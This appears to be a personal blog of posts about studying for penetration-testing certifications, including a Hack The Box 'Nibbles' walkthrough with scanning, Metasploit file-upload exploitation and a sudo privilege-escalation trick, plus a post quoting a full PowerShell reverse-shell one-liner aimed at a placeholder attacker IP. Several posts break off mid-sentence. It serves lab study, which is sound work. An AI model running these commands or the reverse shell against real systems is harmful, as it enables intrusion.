I picked up another book, recommended by Tim Ferriss called The Obstacle Is The Way and I can’t put it down. I’ll most likely finish it up here by this weekend. it’s by Ryan Holiday, the same guy who wrote The Daily Stoic which is a good book if you are interested in what the stoics might have to say about life, bitten into little daily pieces. All this good information about people who had adversity and how they overcame, persisted, and here I am, still working on my OSCP. Look, I get it. Life. I have two kids, and it’s hard. But I am not persisting. TBH, I am reading a lot of these and falling short of a bit of action. Much of it is because I haven’t changed my angle. So I am going to do that again – this time with eCPPTv2 studying. I have been working on the System Security portion of the INE material, and I am not going to lie, it suxs. It’s very technical and not fun when all I want to do is start popping shells. So let’s move to Network Security. I got the idea from a dude on the Internet’s blog about it, and I need to do something. Also, gotta stop eating so much. I am trying Noom to count calories. June started, so let’s start studying again and get back to weight control. Like Gary John Bishop said “You are wired to win”. You will win at everything you decide to do. So let’s do it.
Am I picking this back up?
I feel like Moana – you know how the water called to her? Well, this may sound a little nerdy, but my OSCP journey still calls to me. It’s hard, like really hard. Mad props to all those who are flaunting their OSCP on LinkedIn – I am going to get there, but it’s been some time, and I need to refresh, not cheat through walkthroughs, and just focus. After some deliberation, I took a look at this comment from /u/Howl50vride and ultimately decided on The Cyber Mentor’s Practical Ethical Hacking Course to get back into it.
I think the course is a great place to take few steps back and just refresh. From there, I think I am going to pursue my eCPPT and then onto the OSCP again. I think a lot about my role now in cybersecurity, and I have decided that this will help it. It’s not perfectly aligned, but that’s ok. Who knows what the future will hold. I should follow my passion and see where the world takes me.
I am an eJPT. Woot.
I started the test on Friday, and just finished up this morning with a 93.5% passing rate. I am totally glad I decided to chunk this milestone into my Pen Testing journey!
Next, I think I am going to take some time to learn Git. I have this book, Pro Git, that I will go through a bit. It would be cool to develop some simple pen test tools and at minimum, understand Git. Then, back into PenTesting.
Turn your clocks forward!
Hell World –
Daylight savings begins today, which means it’s spring and the weather is getting much warmer. I took a bike ride with my son yesterday, and fell back in love with living in the city. I think a lot of people are – well, actually everyone, is pretty tired of being cooped up due to COVID. It was nice to see people out and about outside, but a bit cautious because we aren’t all vaccinated yet.
I joined an ISACA book club, and read “Hackable” by Ted Harrington.
It was a pretty easy read, but did highlight issues with application security – specifically black-box testing and app scanning. Basically, just scanning for vulnerabilities is not enough. You have to do application security testing. Also, never do a black-box test. You won’t get enough information, so white-box testing is the way to go. Overall, a good read, and I recommend it if you are looking for something light to read.
On another note, I am picking back up PTSv4. I don’t know why I haven’t gone for my eJPT yet. I think if I can get some more solid studying in – basically finish the black boxes, I will give it a go. Pen testing has been such a journey for me, but having the time to do it has been hard when the kids are up and about. I’ll get there!
Traverxec on HTB!
Yay! I got another easy active box. I am learning a lot about certain services and some privilege escalation. It’s fun. I am officially a script kiddie on hack the box. haha
Well, back to work.
Hack The Box :: Nibbles Walk-through
This is a small win for me. It’s a retired box so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that out of all the walk-throughs, none of the privesc could be replicated. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, that this might be a crumb for you to push through.
First, I ran nmap on the target. I chose to be verbose on everything as my connection to the web is pretty poor at the moment.
nmap -sC -sV -oA initial -vvv 10.10.10.75
Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.
Looking at the code, I found /nibbleblog/ as a path in the URL
Let’s go there.
So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.
Here is where there is an enumeration jump. If you go back to the blog, you will see a link for the atom feed: http://10.10.10.75/nibbleblog/feed.php. The title is nibbles. Also, looking at http://10.10.10.75/nibbleblog/content/private/users.xml shows admin as a user. So yah, play with that and you get the following:
Username: admin
Password: nibbles
I started looking for exploits at this point, and it looks like the best one requires metasploit: https://www.exploit-db.com/exploits/38489. So let’s do it.
root@kali:~# msfconsole
------SNIP--------
=[ metasploit v5.0.58-dev ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > search nibbleblog
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
Let’s use that module.
msf5 > use exploit/multi/http/nibbleblog_file_upload
Set all the required options:
and send.
drop into shell…
meterpreter > shell
Process 2902 created.
Channel 0 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image
Let’s spawn a TTY shell using the following command:
python3 -c "import pty; pty.spawn('/bin/bash')"
Let’s go ahead and get the user.txt flag!
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
<ml/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
Now, Privesc. This was the hardest thing and took me a while to get it down. But finally, this article did me good, and I was able to work it out. One of the first things is figure out is if you have any files that you can invoke as root. So you do that by calling the command:
sudo -l
so we can run /home/nibbler/personal/stuff/monitor.sh as root. Going into /home/nibbler, you are going to want to unzip personal.zip to get that monitor.sh file. Now we need to modify the monitor.sh file to have the following code:
#!/bin/bash
/bin/bash -i
You can do this by either forwarding it to the end of the text file, or uploading the file using netcat and overwrite it, or get back to meterpreter and upload the file. Make sure you make the file executable (chmod +x monitor.sh)
Then just run the following command:
nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
And there we go. Now to get the flag…
cat /root/root.txt
I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!
The Journey is so long and I am so tired
This is getting ridiculous. It’s mainly my fault, but some of these exercises in the labs make me want to bang my head on the wall – really hard.
I am trying, and documenting the exercises. I have been working at them for over five months now, and yes, there are a few that have given me some hiccups. The ones that are hitting me hard are using sqlmap to obtain a shell on a target machine, using password attacks that were described in the book, and the Port Redirection/Tunneling. A lot of this is my fault for not going harder at the problems, and faster. For example, I did get the BoFs, but that was seriously like almost a half a year ago.
It looks like I have 12 days left in the labs, and I am definitely not going to get 10 boxes as root and document them all in that amount of time. Oh yeah, I also signed up for the test in September. Oh, and my wife and I are expecting a child in July.
To make matters worse, the prices are going up. So, it’s been real, but I am not sure if I am going to get this cert any time soon. I am not quite sure where to go from here. So let’s analyze, shall we?
Option one:
(ノಠ益ಠ)ノ彡┻━┻
Okay, let’s put the table back….
┳━┳ ヽ(ಠل͜ಠ)ノ
Let’s try that again:
- Just spend every morning for 2 hours in the lab and the exercises. Try to do the areas that you didn’t get (the exercises that you didn’t get) and if you don’t get them, it’s no biggie. Just try to get back into the material, and hit it hard for the last 12 days.
- Post-time: You didn’t get the 5 points. You’ll get them after your first attempt at the exam. Because face it, you aren’t going to pass your first attempt. So here is where HTB and ippsec walkthroughs will help you. Step one, find some free BoFs and PRACTICE them. You know that’s a solid 20 points.
- Walkthrough the boxes in July. Start figuring out your methods. Just try to get as comfortable you can to at least try the exam in September. August, keep on going. Learn as much as you can from tutorials, the book, watch the videos again and relate them to HTBs.
- Fri, 06 Sep 2019, 05:00 (America/New_York), just try.
- Buy 30 days of lab – $300 bones. Finish up the exercises and the boxes. Get the 5 points, then schedule your exam again. Take it.
Remember what your wife said, it’s not how quickly you pass, but when you pass. Don’t give up, don’t get scared. Just go for it. You got this.
Finally, I am getting to Metasploit. Wow.
Well, I haven’t written for a while, but my daughter turned 4, my wife is expecting in July, and I am waking up pretty early to start studying these days. It’s a slow process, but I’ll get there. My plan is finish the labs, practice on hackthebox.eu and take the test in early September. I feel like failing the first time is simply a right of passage, so if that happens, at least I’ll know what to expect for the next time. I will get this cert. It might take time, but I am going to get it.
I am getting to the end of the labs, and I know now why metasploit is last and why you can only use it on one box – it’s pretty powerful. I did use it to pop my first shell on the lab machines – using 08-067 to exploit SMB!
I didn’t know about meterpreter before the exploit, so I was hanging onto my shell for dear life, trying to upload a privilege escalation executable using certutil and tftp, but the shell was non-interactive and yeah… didn’t get far. But I started reading about meterpreter and all I could think about is how I am going to root that box now with my new knowledge.
The labs ask to perform a few things that I had to skip and gain my knowledge on – i.e., using metasploit to dump hashes and pass the hash. So now, I have to go back and finish up those labs. My lab report, w/o and writeups of pwning the 10 machines is almost at 200 pages. I am not going to fail to get those 5 points. Even if I have to come back and pay for more lab time.
I will have to say that I am really enjoying my time learning through PWK. People slam it for not being current (the exploits and the material), but I think that’s part of it – TRYING HARDER. Also, forget that man, it’s a VERY solid foundation for pen testing.
RCE using RFI attacks
Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.
I seem to be having some trouble with this one, and ultimately going with pausing on this and rethinking. My first thought was to serve
I then backed up and thought to myself if the shell was working at all. So I decided to just upload the script on my victim machine and see if I could get a reverse shell. Well, my windows victim machine is super old and http cacheing wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script, and downloaded the .zip file.
Then I went ahead and unzipped on my victim machine and tried it. It would connect over
I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.
RCE using LFI attacks – happy St. Patty’s Day!
I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using
This got me thinking a bit though, and I started wondering if I didn’t have
I found one that supposedly works with a powershell command:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son).
If I don’t have
Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.